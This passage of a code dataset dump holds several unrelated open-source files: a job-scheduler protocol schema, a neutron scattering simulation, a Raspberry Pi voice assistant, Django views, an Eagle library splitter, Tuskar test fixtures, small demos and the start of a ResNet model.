defined by following ABNF\n\n### Definitions\n\nqueue-id = 1*CHAR\n\nnowork = jsonobject\n ; {}\n\nassignment = jsonobject\n ; {\n ; \"id\": uuid,\n ; \"config\": jsonobject, module config\n ; \"targets\": array of strings\n ; }\n\noutput = jsonobject\n ; {\n ; \"id\": uuid,\n ; \"retval\": int,\n ; \"output\": string, base64 encoded data\n ; }\n\napikey = 1*HEXDIG\nauth-header: = \"Authorization:\" SP \"Apikey\" SP apikey\n\nhttp-ok = \"HTTP/1.1 200 OK\" CRLF CRLF\n ; standard http response\nhttp-bad-request = \"HTTP/1.1 400 Bad Request\" CRLF CRLF\n ; standard http response\n\n\n### Request assignment/job\n\nrequest-assign-job = \"GET /api/v1/scheduler/job/assign\" [\"/\" queue-id] SP \"HTTP/1.1\" CRLF auth-header CRLF CRLF\nresponse-assign-job\t= response-nowork / response-assignment\nresponse-nowork\t\t= http-ok nowork\nresponse-assignment\t= http-ok assignment\n\n\n### Upload assignment/job output\n\nrequest-job-output\t= \"POST /api/v1/scheduler/job/output HTTP/1.1\" CRLF auth-header CRLF CRLF output\nresponse-job-output\t= response-accepted / response-refused\nresponse-accepted\t= http-ok\n ; output accepted\nresponse-refused\t= http-bad-request\n ; malformed request or output refused\n\"\"\"\n# pylint: disable=invalid-name\n\ncommon_definitions = {\n \"UUID\": {\n \"type\": \"string\",\n \"pattern\": r\"^[a-f0-9\\-]{36}$\"\n }\n}\n\nassignment = {\n \"$schema\": \"http://json-schema.org/draft-07/schema#\",\n \"definitions\": common_definitions,\n\n \"type\": \"object\",\n \"required\": [\"id\", \"config\", \"targets\"],\n \"additionalProperties\": False,\n \"properties\": {\n \"id\": {\n \"$ref\": \"#/definitions/UUID\"\n },\n \"config\": {\n \"type\": \"object\",\n \"required\": [\"module\"],\n \"additionalProperties\": True,\n \"properties\": {\n \"module\": {\"type\": \"string\"}\n }\n },\n \"targets\": {\n \"type\": \"array\",\n \"items\": {\"type\": \"string\"}\n }\n }\n}\n\noutput = {\n \"$schema\": \"http://json-schema.org/draft-07/schema#\",\n \"definitions\": common_definitions,\n\n \"type\": \"object\",\n \"required\": [\"id\", \"retval\", \"output\"],\n \"additionalProperties\": False,\n \"properties\": {\n \"id\": {\n \"$ref\": \"#/definitions/UUID\"\n },\n \"retval\": {\n \"type\": \"integer\"\n },\n \"output\": {\n \"type\": \"string\"\n }\n }\n}\n","sub_path":"sner/agent/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"585194781","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\t# Paramètres et sauvegarde des figures\ndef createPlot(axis = False, xScaling = False, yScaling = False, xLabel = False, yLabel = False,\n\t\t\t originLines = False, grid = False, invert = False, legend = False, title = False, file = False):\n\tif axis: plt.axis(axis)\n\tif xScaling: plt.xscale(xScaling)\n\tif yScaling: plt.yscale(yScaling)\n\tif xLabel: plt.xlabel(xLabel)\n\tif yLabel: plt.ylabel(yLabel)\n\tif originLines:\n\t\tplt.axhline(y = 0, color = \"k\")\n\t\tplt.axvline(x = 0, color = \"k\")\n\tif grid:\n\t\tplt.minorticks_on()\n\t\tplt.grid(True, \"minor\", color = \"grey\", linestyle = \"--\", linewidth = 0.25)\n\t\tplt.grid(True, \"major\", color = \"black\", linestyle = \"--\", linewidth = 0.5)\n\tif invert:\n\t\tif ((invert == \"xAxis\") or (invert == \"both\")):\n\t\t\tplt.gca().invert_xaxis()\n\t\tif ((invert == \"yAxis\") or (invert == \"both\")):\n\t\t\tplt.gca().invert_yaxis()\n\tif legend: plt.legend()\n\tif title: plt.title(title)\n\tif file: plt.savefig(file)\n\ndef neutronInteraction(absorptionProb, scatterProb, lam, plateDepth, neutronAmount):\n\tsumReflected, sumAbsorbed, sumTransmitted = 0, 0, 0\n\n\tfor i in range(0, neutronAmount):\n\t\ttheta, x = 0.0, 0.0\n\n\t\twhile True:\n\t\t\tr = np.random.random()\n\t\t\tl = -lam*np.log(r)\n\t\t\tx += l*np.cos(theta)\n\n\t\t\t\t# Si (x < 0), le neutron est réfléchi\n\t\t\tif (x < 0):\n\t\t\t\tsumReflected += 1\n\t\t\t\tbreak\n\t\t\t\t# Si (x > d), le neutron a traversé la plaque\n\t\t\telif (x > plateDepth):\n\t\t\t\tsumTransmitted += 1\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tr = np.random.random()\n\t\t\t\t\t# Si (r < pA), le neutron est absorbé\n\t\t\t\tif (r < absorptionProb):\n\t\t\t\t\tsumAbsorbed += 1\n\t\t\t\t\tbreak\n\t\t\t\t\t# Si (pA <= r < (pA + pS)), le neutron est dispersé dans la plaque, mais n'est pas absorbé\n\t\t\t\telif (r < (absorptionProb + scatterProb)):\n\t\t\t\t\ttheta = np.arccos(1 - 2*r)\n\t\t\t\t\tcontinue\n\t\t\t\t\t# Si (r >= (pA + pS)), le neutron est toujours dans la plaque, mais n'est ni absorbé, ni dispersé\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\n\t\t# Taux de neutrons réfléchis/absorbés/transmis\n\treflectionRate = sumReflected/neutronAmount\n\tabsorptionRate = sumAbsorbed/neutronAmount\n\ttransmissionRate = sumTransmitted/neutronAmount\n\n\t\t# Incertitudes sur les taux neutrons réfléchis/absorbés/transmis\n\tsigmaReflectionRate = rateUncertainty(reflectionRate, neutronAmount)\n\tsigmaAbsorptionRate = rateUncertainty(absorptionRate, neutronAmount)\n\tsigmaTransmissionRate = rateUncertainty(transmissionRate, neutronAmount)\n\n\t\t# Incertitudes sur la somme des neutrons réfléchis/absorbés/transmis\n\tsigmaReflectionSum = sumUncertainty(sumReflected, neutronAmount)\n\tsigmaAbsorptionSum = sumUncertainty(sumAbsorbed, neutronAmount)\n\tsigmaTransmissionSum = sumUncertainty(sumTransmitted, neutronAmount)\n\n\trates = [reflectionRate, absorptionRate, transmissionRate]\n\trateSigmas = [sigmaReflectionRate, sigmaAbsorptionRate, sigmaTransmissionRate]\n\tsumSigmas = [sigmaReflectionSum, sigmaAbsorptionSum, sigmaTransmissionSum]\n\n\treturn rates, rateSigmas, sumSigmas\n\n\t# Formules d'incertitudes\nrateUncertainty = lambda X, N : np.sqrt(X*(1 - X)/(N - 1))\nsumUncertainty = lambda X, N : np.sqrt(X*(N - X)/(N - 1))\n\n\t# Initialisations des valeurs\npA = 0.3\npS = 0.3\nlam = 0.2\nd = 1\nneutronAmount = 1000\nsimulationRounds = 500\n\n\t# Initialisations des tableaux\nR, A, T = np.zeros(simulationRounds), np.zeros(simulationRounds), np.zeros(simulationRounds)\nsR, sA, sT = np.zeros(simulationRounds), np.zeros(simulationRounds), np.zeros(simulationRounds)\nsigR, sigA, sigT = np.zeros(simulationRounds), np.zeros(simulationRounds), np.zeros(simulationRounds)\nsigSR, sigSA, sigST = np.zeros(simulationRounds), np.zeros(simulationRounds), np.zeros(simulationRounds)\n\n\t# Boucle de simulations\nfor i in range(0, simulationRounds):\n\trates, rateSigmas, sumSigmas = neutronInteraction(pA, pS, lam, d, neutronAmount)\n\n\tR[i] = rates[0]\n\tA[i] = rates[1]\n\tT[i] = rates[2]\n\n\tsR[i] = rates[0]*neutronAmount\n\tsA[i] = rates[1]*neutronAmount\n\tsT[i] = rates[2]*neutronAmount\n\n\tsigR[i] = rateSigmas[0]\n\tsigA[i] = rateSigmas[1]\n\tsigT[i] = rateSigmas[2]\n\n\tsigSR[i] = sumSigmas[0]\n\tsigSA[i] = sumSigmas[1]\n\tsigST[i] = sumSigmas[2]\n\n\t# Incertitudes maximales\nsigR, sigA, sigT = np.max(sigR), np.max(sigA), np.max(sigT)\nsigSR, sigSA, sigST = np.max(sigSR), np.max(sigSA), np.max(sigST)\n\nvarianceR = np.average(np.abs(np.diff(R)))\nvarianceA = np.average(np.abs(np.diff(A)))\nvarianceT = np.average(np.abs(np.diff(T)))\n\nprint(f\"Variance moyenne de R ({varianceR:.6f}), comparée à sigR ({sigR:.6f})\")\nprint(f\"Variance moyenne de A ({varianceA:.6f}), comparée à sigA ({sigA:.6f})\")\nprint(f\"Variance moyenne de T ({varianceT:.6f}), comparée à sigT ({sigT:.6f})\")\n\nvarianceSR = np.average(np.abs(np.diff(sR)))\nvarianceSA = np.average(np.abs(np.diff(sA)))\nvarianceST = np.average(np.abs(np.diff(sT)))\n\nprint(f\"Variance moyenne de sR ({varianceSR:.6f}), comparée à sigSR ({sigSR:.6f})\")\nprint(f\"Variance moyenne de sA ({varianceSA:.6f}), comparée à sigSA ({sigSA:.6f})\")\nprint(f\"Variance moyenne de sT ({varianceST:.6f}), comparée à sigST ({sigST:.6f})\")\n\n\t# Dimensions de la figure (width, height)\nfigsize = (12, 8)\n\nfig, axes = plt.subplots(1, 3, figsize = figsize, sharey = True)\nfig.suptitle(\"Histogramme d'interaction entre un faisceau de neutron et une plaque\")\naxes[0].hist(sR, color = \"r\", edgecolor = \"k\", linewidth = 1)\naxes[0].set_title(\"Histogramme des neutrons réfléchis\")\naxes[0].set(xlabel = \"sR\")\naxes[1].hist(sA, color = \"g\", edgecolor = \"k\", linewidth = 1)\naxes[1].set_title(\"Histogramme des neutrons absorbés\")\naxes[1].set(xlabel = \"sA\")\naxes[2].hist(sT, color = \"b\", edgecolor = \"k\", linewidth = 1)\naxes[2].set_title(\"Histogramme des neutrons transmis\")\naxes[2].set(xlabel = \"sT\")\n\nfor axe in axes:\n\taxe.set(ylabel = \"Fréquence\")\n\taxe.label_outer()\n\ncreatePlot(file = \"histogramme3.png\")\nplt.show()\n","sub_path":"source/tp/6/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"504071983","text":"#!/usr/bin/python3\r\n\r\n# chmod o+x hora.py // Se le dan permisos al archivo\r\n# crontab -e // Ejecutamos el crontab para que se pueda iniciar solo el script al iniciar el sistema\r\n# @reboot python3 /home/pi/asistente/main.py // Agregamos al crontab esta linea, se guarda y se reinicia, ya deberia funcionar\r\n\r\n# sudo rasp-config // Hay que cambiar la salida del audio ya que por defecto usa la de HDMI, configuramos a plug que es salida analoga\r\n\r\n\r\n# https://es.stackoverflow.com/questions/150343/c%C3%B3mo-se-hace-en-linux-para-ejecutar-un-archivo-python-al-arrancar-la-m%C3%A1quina\r\n# https://pypi.org/project/SpeechRecognition/3.0.0/\r\n# https://www.raspberrypi-spy.co.uk/2019/06/using-a-usb-audio-device-with-the-raspberry-pi/\t // Cambiar salida de audio\r\n\r\n# sudo apt install portaudio19-dev\r\n# sudo apt install mpg321\r\n# sudo apt install flac\r\n# sudo apt install python3-pip\r\n# sudo pip3 install SpeechRecognition\r\n# sudo pip3 install pyaudio\r\n# sudo pip3 install gTTS\r\n\r\n# Nuevos, aun no los uso pero van a ser para text_parser\r\n# pip3 install nltk\r\n# pip3 install numpy\r\n\r\nimport threading\r\nimport time\r\nimport random\r\n\r\nfrom datetime import datetime\r\nfrom datetime import date\r\n\r\nfrom servidor import Servidor\r\nfrom voice_input import Voice_input\r\nfrom voice_output import Voice_output\r\n#from text_parser import Text_parser\r\nfrom procesa_comando import Procesa_comando\r\nimport raspberry as rpi\r\n\r\n\r\ndef ServidorComandos():\r\n\ts = Servidor(3333) # numero de puerto\r\n\tglobal idioma, w\r\n\twhile(True):\r\n\t\ttry:\r\n\t\t\tmsg = s.recibir()\r\n\t\t\tval, idioma = w.ProcesaComando(msg,idioma)\r\n\t\texcept:\r\n\t\t\tpass\r\n\r\ndef GpioAutomatico(): # Mantiene el ventilador funcionando cuando es necesario, y agregar funciones de encendido automatico.\r\n\tglobal hora_encendido, hora_apagado\r\n\tstatus_actual = 0\r\n\twhile True:\r\n\t\tif round(rpi.get_cpu_temp()) >= 42:\r\n\t\t\trpi.onPin(12)\r\n\t\telse:\r\n\t\t\trpi.offPin(12)\r\n\r\n\t\thora_act = datetime.now().time()\r\n\t\tif (hora_act > hora_encendido) and (hora_act < hora_apagado):\r\n\t\t\tif status_actual == 0:\r\n\t\t\t\tstatus_actual = 1\r\n\t\t\t\trpi.onRele(11)\r\n\t\telif (status_actual == 1):\r\n\t\t\tstatus_actual = 0\r\n\t\t\trpi.offRele(11)\r\n\r\n\t\ttime.sleep(15)\r\n\r\nhiloServidor = threading.Thread(target=ServidorComandos)\r\nhiloServidor.start()\r\n\r\n# Configuracion de raspberry\r\npines = [7,11,12] # Ventilador es el GPIO 12, 11 luz roja\r\nrpi.iniciar(False,\"BOARD\",pines)\r\nfor i in pines:\r\n\trpi.offRele(i)# apagamos todos los pines\r\n\r\nhora_encendido = datetime.strptime(\"20:00:00\",\"%X\").time()\r\nhora_apagado = datetime.strptime(\"22:30:00\",\"%X\").time()\r\n\r\nhiloGpio = threading.Thread(target=GpioAutomatico)\r\nhiloGpio.start()\r\n\r\ns = Voice_output()\r\nv = Voice_input(\"USB\") # Nombre del microfono, 1 para mostrar los micros existentes\r\nw = Procesa_comando(1) # El 1 hace que imprima el comando enviado en consola\r\nidioma = \"es\"\r\n\r\nwhile(True):\r\n\ttexto = v.ObtenerRespuestaVoz(idioma)\r\n\tval, idioma = w.ProcesaComando(texto,idioma) # val es el retorno de funcion, si es -1 no existe, si es 1 se ejecuto bien y hubo respuesta de voz, 2 se ejecuto sin respuesta de voz, se la brindamos:\r\n\tif val == -1:\r\n\t\tif idioma == \"en\":\r\n\t\t\ts.RespuestadeVoz(\"Sorry but i couldn't run the command\",idioma)\r\n\t\telse:\r\n\t\t\ts.RespuestadeVoz(\"Perdon pero no pude ejecutar el comando\",idioma)\r\n\telif val == 2:\r\n\t\tsalidas = [\"listo\",\"hecho\",\"de acuerdo\",\"sin problema\",\"claro\",\"okey\",\"esta bien\"]\r\n\t\ts.RespuestadeVoz(random.choice(salidas),idioma)\r\n\ttime.sleep(1)\r\n\r\n# unused\r\n# v = Voice_input(\"sysdefault\",1)\r\n# #analizar = Text_parser()\r\n# salida.RespuestadeVoz(\"es\",\"Hola, soy tu asistente de voz, ¿cual es tu nombre?\")\r\n# texto = v.ObtenerRespuestaVoz(\"es\")\r\n# nombre = analizar.obtenerNombre(texto)\r\n# salida.RespuestadeVoz(\"es\",\"Hola David, ¿como quieres llamarme?\")\r\n# texto = v.ObtenerRespuestaVoz(\"es\") \r\n# salida.RespuestadeVoz(\"es\",\"Muy bien, mi nombre sera Alina, vamos a realizar las primeras configuraciones\")\r\n# v = Procesa_comando()\r\n# v.ProcesaComando(\"idioma\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"337259332","text":"from django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserRegisterForm, ProfileUpdateForm\nfrom .models import Profile\n\n# Create your views here.\n\n\ndef register(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f'Merci {username}, votre compte a été créé avec succés, vous pouvez maintenant vous connecter')\n return redirect('login')\n else:\n form = UserRegisterForm()\n return render(request, 'account/register.html', {'form': form})\n\n\n@login_required\ndef profile(request):\n user_pk = request.user.pk\n user_profile = Profile.objects.get(user_id=user_pk)\n products = user_profile.favorite.all()\n\n if request.method == 'POST':\n p_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)\n\n if p_form.is_valid:\n try:\n p_form.save()\n messages.success(request, 'Votre photo a été mise à jour !')\n return redirect('profile')\n except ValueError:\n messages.error(request, 'Veuillez mettre en ligne une image')\n return redirect('profile')\n\n else:\n p_form = ProfileUpdateForm()\n\n context = {\n \"products\": products,\n \"p_form\": p_form\n }\n return render(request, 'account/profile.html', context)\n","sub_path":"purbeurre/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"148413653","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport shutil\nimport xml.dom.minidom\nimport re\n\n\ndef find_only_subnode(element, subnode_name):\n ret = element.getElementsByTagName(subnode_name)\n assert len(ret) == 1, \"Found more or less than 1 %s node\" % subnode_name\n return ret[0]\n\n\ndef filter_filenames(in_name, outdir, extension):\n new_name = re.sub(\"[^0-9A-Za-z_\\-]\", \"-\", in_name)\n filename = \"%s/%s.%s\" % (outdir, new_name, extension)\n if not os.path.exists(filename):\n return filename\n\n extra_num = 0\n filename = \"%s/%s.%s\" % (outdir, new_name + str(extra_num), extension)\n while os.path.exists(filename):\n extra_num = extra_num + 1\n filename = \"%s/%s.%s\" % (outdir, new_name + str(extra_num), extension)\n return filename\n\n\ndef write_out_subnode(node, outdir, extension):\n name = node.getAttribute(\"name\")\n filename = filter_filenames(name, outdir, extension)\n assert not os.path.exists(filename), (\n \"The output file %s already exists!\" % filename)\n f = open(filename, \"w\")\n f.write(node.toxml(\"utf-8\"))\n f.close()\n\n\ndef main():\n if len(sys.argv) != 3:\n print(\"Usage: %s file.lbr outdir\" % (sys.argv[0]))\n sys.exit(1)\n\n lbrfile = sys.argv[1]\n outdir = sys.argv[2]\n\n # parse lbr\n lbr = xml.dom.minidom.parse(lbrfile)\n libraryNode = find_only_subnode(lbr, \"library\")\n\n # find the main stuff\n packagesNode = find_only_subnode(libraryNode, \"packages\")\n symbolsNode = find_only_subnode(libraryNode, \"symbols\")\n devicesetsNode = find_only_subnode(libraryNode, \"devicesets\")\n\n # FIXME: may be dangerous\n shutil.rmtree(outdir, ignore_errors=True)\n os.mkdir(outdir)\n\n # remove all the packages, symbols, devicesets\n packagesNode.parentNode.removeChild(packagesNode)\n symbolsNode.parentNode.removeChild(symbolsNode)\n devicesetsNode.parentNode.removeChild(devicesetsNode)\n\n # write out the remainder (the \"metadata\")\n f = open(\"%s/meta.xml\" % outdir, \"w\")\n lbr.writexml(f)\n f.close()\n\n # write out all the \"main stuff\"\n for n in packagesNode.childNodes:\n if n.nodeType == xml.dom.Node.TEXT_NODE:\n assert n.data.strip() == \"\", (\n \"Text node with some data not understood (%s)\" % n.data)\n else:\n assert n.nodeType == xml.dom.Node.ELEMENT_NODE, (\n \"Unknown node type (%s)\" % n.nodeType)\n write_out_subnode(n, outdir, \"pac\")\n\n for n in symbolsNode.childNodes:\n if n.nodeType == xml.dom.Node.TEXT_NODE:\n assert n.data.strip() == \"\", (\n \"Text node with some data not understood (%s)\" % n.data)\n else:\n assert n.nodeType == xml.dom.Node.ELEMENT_NODE, (\n \"Unknown node type (%s)\" % n.nodeType)\n write_out_subnode(n, outdir, \"sym\")\n\n for n in devicesetsNode.childNodes:\n if n.nodeType == xml.dom.Node.TEXT_NODE:\n assert n.data.strip() == \"\", (\n \"Text node with some data not understood (%s)\" % n.data)\n else:\n assert n.nodeType == xml.dom.Node.ELEMENT_NODE, (\n \"Unknown node type (%s)\" % n.nodeType)\n write_out_subnode(n, outdir, \"dev\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/split_lbr.py","file_name":"split_lbr.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"415799695","text":"from math import e\r\nfrom kivy.app import App\r\nfrom kivy.uix.gridlayout import GridLayout\r\n\r\nclass MainGridLayout(GridLayout):\r\n def calc(self,event):\r\n if event:\r\n try:\r\n self.display.text = str(eval(event))\r\n except:\r\n self.display.text(\"error\")\r\n else:\r\n self.display.text(\"error\")\r\n\r\nclass TestApp(App):\r\n def build(self):\r\n return MainGridLayout()\r\n\r\nkv = TestApp()\r\nkv.run()\r\n","sub_path":"part03/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"284110778","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom tuskar_ui import api\n\nfrom openstack_dashboard.test.test_data import utils as test_data_utils\n\nfrom novaclient.v1_1.contrib import baremetal\nfrom tuskarclient.v1 import flavors\nfrom tuskarclient.v1 import racks\nfrom tuskarclient.v1 import resource_classes\n\n\ndef data(TEST):\n # Flavors\n TEST.tuskarclient_flavors = test_data_utils.TestDataContainer()\n TEST.tuskar_flavors = test_data_utils.TestDataContainer()\n flavor_1 = flavors.Flavor(flavors.FlavorManager(None),\n {'id': '1',\n 'name': 'nano',\n 'max_vms': 100,\n 'capacities':\n [{\"name\": \"cpu\",\n \"value\": 64,\n \"unit\": \"CPU\"},\n {\"name\": \"memory\",\n \"value\": 1024,\n \"unit\": \"MB\"},\n {\"name\": \"storage\",\n \"value\": 1,\n \"unit\": \"GB\"},\n {\"name\": \"ephemeral_disk\",\n \"value\": 0,\n \"unit\": \"GB\"},\n {\"name\": \"swap_disk\",\n \"value\": 2,\n \"unit\": \"GB\"}]})\n flavor_2 = flavors.Flavor(flavors.FlavorManager(None),\n {'id': '2',\n 'name': 'large',\n 'max_vms': 10,\n 'capacities': []})\n TEST.tuskarclient_flavors.add(flavor_1, flavor_2)\n TEST.tuskar_flavors.add(api.Flavor(flavor_1), api.Flavor(flavor_2))\n\n # Resource Classes\n TEST.tuskarclient_resource_classes = test_data_utils.TestDataContainer()\n TEST.tuskar_resource_classes = test_data_utils.TestDataContainer()\n resource_class_1 = resource_classes.ResourceClass(\n resource_classes.ResourceClassManager(None),\n {'id': '1',\n 'service_type': 'compute',\n 'racks': [{'id': 1}, {'id': 2}],\n 'name': 'rclass1'})\n resource_class_2 = resource_classes.ResourceClass(\n resource_classes.ResourceClassManager(None),\n {'id': '2',\n 'service_type': 'compute',\n 'racks': [],\n 'name': 'rclass2'})\n TEST.tuskarclient_resource_classes.add(resource_class_1, resource_class_2)\n TEST.tuskar_resource_classes.add(api.ResourceClass(resource_class_1),\n api.ResourceClass(resource_class_2))\n\n #Racks\n TEST.tuskarclient_racks = test_data_utils.TestDataContainer()\n TEST.tuskar_racks = test_data_utils.TestDataContainer()\n rack_1 = racks.Rack(racks.RackManager(None),\n {'id': '1',\n 'name': 'rack1',\n 'location': 'location',\n 'subnet': '192.168.1.0/24',\n 'state': 'active',\n 'nodes':\n [{'id': '1'},\n {'id': '2'},\n {'id': '3'},\n {'id': '4'}],\n 'capacities':\n [{\"name\": \"total_cpu\",\n \"value\": \"64\",\n \"unit\": \"CPU\"},\n {\"name\": \"total_memory\",\n \"value\": \"1024\",\n \"unit\": \"MB\"}],\n 'resource_class': {'id': '1'}})\n rack_2 = racks.Rack(racks.RackManager(None),\n {'id': '2',\n 'name': 'rack2',\n 'location': 'location',\n 'subnet': '192.168.1.0/25',\n 'state': 'provisioning',\n 'nodes': [],\n 'capacities':\n [{\"name\": \"total_cpu\",\n \"value\": \"1\",\n \"unit\": \"CPU\"},\n {\"name\": \"total_memory\",\n \"value\": \"4\",\n \"unit\": \"MB\"}],\n 'resource_class': {'id': '1'}})\n rack_3 = racks.Rack(racks.RackManager(None),\n {'id': '3',\n 'name': 'rack3',\n 'location': 'location',\n 'subnet': '192.168.1.0/26',\n 'state': 'inactive',\n 'nodes': [],\n 'capacities':\n [{\"name\": \"total_cpu\",\n \"value\": \"1\",\n \"unit\": \"CPU\"},\n {\"name\": \"total_memory\",\n \"value\": \"2\",\n \"unit\": \"MB\"}],\n 'resource_class': None})\n TEST.tuskarclient_racks.add(rack_1, rack_2, rack_3)\n TEST.tuskar_racks.add(api.Rack(rack_1), api.Rack(rack_2), api.Rack(rack_3))\n\n # Nodes\n TEST.baremetalclient_nodes = test_data_utils.TestDataContainer()\n TEST.baremetal_nodes = test_data_utils.TestDataContainer()\n TEST.baremetalclient_unracked_nodes = test_data_utils.TestDataContainer()\n TEST.baremetal_unracked_nodes = test_data_utils.TestDataContainer()\n TEST.baremetalclient_nodes_all = test_data_utils.TestDataContainer()\n TEST.baremetal_nodes_all = test_data_utils.TestDataContainer()\n\n node_1 = baremetal.BareMetalNode(\n baremetal.BareMetalNodeManager(None),\n {'id': '1',\n 'name': 'node1',\n 'prov_mac_address': '00-B0-D0-86-AB-F7'})\n node_2 = baremetal.BareMetalNode(\n baremetal.BareMetalNodeManager(None),\n {'id': '2',\n 'name': 'node2',\n 'prov_mac_address': '00-B0-D0-86-AB-F8'})\n node_3 = baremetal.BareMetalNode(\n baremetal.BareMetalNodeManager(None),\n {'id': '3',\n 'name': 'node3',\n 'prov_mac_address': '00-B0-D0-86-AB-F9'})\n node_4 = baremetal.BareMetalNode(\n baremetal.BareMetalNodeManager(None),\n {'id': '4',\n 'name': 'node4',\n 'prov_mac_address': '00-B0-D0-86-AB-F0'})\n node_5 = baremetal.BareMetalNode(\n baremetal.BareMetalNodeManager(None),\n {'id': '5',\n 'name': 'node5',\n 'prov_mac_address': '00-B0-D0-86-AB-F1'})\n\n TEST.baremetalclient_nodes.add(node_1, node_2, node_3, node_4)\n TEST.baremetal_nodes.add(api.Node(node_1),\n api.Node(node_2),\n api.Node(node_3),\n api.Node(node_4))\n TEST.baremetalclient_unracked_nodes.add(node_5)\n TEST.baremetal_unracked_nodes.add(api.Node(node_5))\n TEST.baremetalclient_nodes_all.add(node_1, node_2, node_3, node_4, node_5)\n TEST.baremetal_nodes_all.add(api.Node(node_1),\n api.Node(node_2),\n api.Node(node_3),\n api.Node(node_4),\n api.Node(node_5))\n","sub_path":"tuskar_ui/test/test_data/tuskar_data.py","file_name":"tuskar_data.py","file_ext":"py","file_size_in_byte":7817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"410314422","text":"__author__ = 'jiangdon'\n\n\nimport numpy as np\nimport matplotlib.pylab as plt\n\n\nN = 10\nxlist = np.linspace(0, 1, N)\nylist = np.sin(2*np.pi*xlist)+np.random.normal(0, 0.2, xlist.size)\nx = np.linspace(0, 1, 1000)\ny = np.sin(2*np.pi*x)\n\nplt.plot(x, y, 'r-')\nplt.plot(xlist, ylist, 'go')\nplt.xlim(0, 1)\nplt.ylim(-1.5, 1.5)\nplt.show()","sub_path":"com/edu/bupt/prml/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52532475","text":"class Battleship:\n \"\"\"\n Representation of a battleship, holds the battleship positions and validate sinking\n \"\"\"\n def __init__(self, positions):\n \"\"\"\n creates battleship instance based on positions\n :param positions: list of string containing the battleship positions e.g. ['00', '01', '02', '03']\n \"\"\"\n self.positions = positions\n self.hit_positions = []\n self.is_sunk = False\n\n def is_contained(self, position):\n \"\"\"\n checks if the battleship is located at that position\n :param position: a position to be checked, string of row and column e.g. '34'\n :return: 'Z' in case the battleship is located at the given position, 'X' in case the battleship is located at\n the given position and was already hit, 'O' in case the battleship is not located at the given position\n \"\"\"\n if position in self.positions:\n return 'Z'\n elif position in self.hit_positions:\n return 'X'\n return 'O'\n\n def hit(self, position):\n \"\"\"\n try to hit the battleship at the given position\n :param position: a position to be checked, string of row and column e.g. '34'\n :return: True in case of a hit, False in case of a miss\n \"\"\"\n if position in self.positions:\n self.hit_positions.append(position)\n self.positions.remove(position)\n if len(self.positions) == 0:\n self.is_sunk = True\n return True\n return False\n","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"362517973","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\nimport torch.utils.model_zoo as model_zoo\nfrom torch.autograd import Variable\nfrom collections import OrderedDict\nimport numpy as np\nfrom torch.nn import BatchNorm2d as bn\n\n# __all__ = ['ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152']\n\n\n# model_urls = {\n # 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',\n # 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',\n # 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',\n # 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',\n # 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',\n# }\n\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = nn.BatchNorm2d(planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n 